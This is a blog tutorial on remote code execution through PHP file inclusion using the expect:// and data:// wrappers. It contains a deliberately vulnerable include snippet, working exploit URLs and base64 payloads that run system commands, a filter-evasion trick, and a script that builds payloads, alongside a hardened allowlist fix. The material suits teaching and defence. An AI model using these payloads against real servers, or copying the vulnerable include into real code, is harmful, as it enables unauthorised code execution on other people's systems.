Monday, June 16, 2014

Remote Code Execution Through PHP Wrappers

Since I've not seen some of these methods covered around here (except for php://filter and php://input), I decided to put up some material on them. They are more or less self-explanatory, but I still feel the need to walk through the process. First of all, in order to execute anything, the following conditions have to be met:
  • A $_GET parameter that reaches include/require
- Which we'll be passing the payload to
  • Version of PHP
- 4.3+ for expect:// (the PECL expect extension must also be installed and loaded)
- 5.2+ for data://

  • allow_url_include enabled in php.ini (it is Off by default)
- Required for data:// (and php://input); expect:// is not restricted by allow_url_include or allow_url_fopen, so it works even when both are Off

expect://
The expect:// wrapper is not enabled by default: it comes from the PECL expect extension, which has to be installed and loaded (consider it installed for now). The syntax it accepts is:
expect://[command]
Consider this small snippet running on the backend (deliberately vulnerable: the parameter goes straight into include):
<?php

include $_GET['page']; // no validation, no allowlist: wrappers and paths go straight in
//..
?>
The wrapper hands the command to expect, runs it, and include treats whatever the command prints as the file to include, so the command executes on the server as the web-server user. Take the following URL for instance:
http://example.com/Keeper.php?page=expect://id
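As an added example (not code from the original post), here is the hardened counterpart to the include above: the requested page name is looked up in an allowlist and mapped to a file the application owns, so a wrapper URL such as expect://id or a traversal path never reaches include. The page names and file paths are assumptions; the code needs PHP 7.1 or later.

```php
<?php
// Added example, not from the original post. Hardened counterpart to
// `include $_GET['page'];`: the request carries only a short name, and the
// name is mapped through a fixed table, so include never sees user input.

// Assumed page names and paths; a real application has its own table.
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

/**
 * Map a requested page name to a file path, or null if it is not allowed.
 * An exact key lookup misses "expect://id", "data://text/plain,...",
 * "php://filter/..." and "../../etc/passwd" alike, with no pattern matching
 * to get wrong.
 */
function resolve_page(string $requested): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    return __DIR__ . '/' . PAGES[$requested];
}

$requested = $_GET['page'] ?? 'home';
$file = resolve_page($requested);

if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}

include $file;
```

An allowlist beats a denylist here: rejecting "://" would still let a traversal path through, and rejecting a few wrapper names would miss php://filter, php://input and the rest. Setting allow_url_include=Off in php.ini is still worth doing because it closes data:// and php://input regardless of the code, but expect:// is not covered by that setting, so the code-level check is what actually stops it.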

data://
The data:// wrapper bears the same concept, except that the content you supply is the PHP code itself: no extension is needed, but allow_url_include must be On. Syntax followed:
data://text/plain;base64,[PHP code encoded in base64]
or we can simply:
data://text/plain,[PHP code]
We'll take under account that we'll be using the above inclusion of the $_GET parameter, so there are two possible scenarios:
http://example.com/Keeper.php?page=data://text/plain;base64,PD9zeXN0ZW0oJ2lkJyk7Pz4=
http://example.com/Keeper.php?page=data://text/plain,<?system('id');?>
The base64 string decodes to <?system('id');?>. Base64-encode the raw PHP, not a URL-encoded copy of it: a payload that was URL-encoded before base64 encoding decodes to literal %3C%3F... text, which include just echoes instead of executing. Two more gotchas: the short <? open tag only works when short_open_tag is On, so <?php system('id'); ?> is the safer form, and any + in the base64 output must be sent as %2B or the query-string parser turns it into a space.
In case a WAF filters the code that follows the wrapper, as in the last examples, one trick is to split the payload across two copies of the parameter, so that a backend which joins duplicate parameters with a comma rebuilds the wrapper URL, the comma landing exactly where data:// expects the separator between the media type and the body:
http://example.com/Keeper.php?page=data://text/plain&page=<?system('id');?>
Note that this comma-joining is ASP.NET/IIS behaviour. PHP keeps only the last value of a repeated parameter, so against the snippet above $_GET['page'] would be just <?system('id');?> and the wrapper would be lost; the split does not work against a PHP include on its own, it only helps where a filter in front of the application parses duplicates differently from the backend.
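As an added example (not from the original post), this CLI script builds both data:// forms from a PHP snippet, URL-encodes them for the query string, and then decodes them the way the server side would, so you can confirm that the body reaching include is exactly the code you meant. The target URL, the snippet and the file name are assumptions; it needs PHP 8 for str_ends_with.

```php
<?php
// Added example, not from the original post. Builds the plain and base64
// data:// payloads for a given PHP snippet and round-trips them through the
// decoding the server performs. Run with: php build_data_payload.php
// (assumed file name; TARGET is an assumed URL).

const TARGET = 'http://example.com/Keeper.php';

// data://text/plain,<code>  with the code URL-encoded so that <, ?, ;, '
// and spaces survive the trip through browsers and proxies unchanged.
function plain_payload(string $code): string
{
    return 'data://text/plain,' . rawurlencode($code);
}

// data://text/plain;base64,<base64 code>. The base64 alphabet contains '+',
// which PHP's query-string parser turns into a space, so the encoded body is
// URL-encoded too ('+' becomes %2B, '=' becomes %3D).
function base64_payload(string $code): string
{
    return 'data://text/plain;base64,' . rawurlencode(base64_encode($code));
}

// What the vulnerable `include $_GET['page'];` actually sees: first the query
// string is URL-decoded, then the data:// wrapper splits media type from body
// at the first comma and base64-decodes the body when ";base64" is present.
function decoded_body(string $wrapper_url): string
{
    $query_decoded = rawurldecode($wrapper_url);
    $parts = explode(',', substr($query_decoded, strlen('data://')), 2);
    if (count($parts) !== 2) {
        return '';
    }
    [$meta, $body] = $parts;
    if (str_ends_with($meta, ';base64')) {
        $decoded = base64_decode($body, true);
        return $decoded === false ? '' : $decoded;
    }
    return $body;
}

// Use the long open tag: '<?' alone depends on short_open_tag being On.
$code = "<?php system('id'); ?>";

foreach (['plain' => plain_payload($code), 'base64' => base64_payload($code)] as $kind => $payload) {
    $url = TARGET . '?page=' . $payload;
    $body = decoded_body($payload);
    $ok = ($body === $code) ? 'ok' : 'MISMATCH';
    printf("%-6s %s\n       server decodes to: %s [%s]\n", $kind, $url, $body, $ok);
}
```

The round-trip check is the part worth keeping: if you encode the snippet in any other order (for instance URL-encoding it and then base64-encoding the result), decoded_body shows the literal %3C%3F... text the server would include, and the MISMATCH tells you before you send a payload that can only echo itself.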
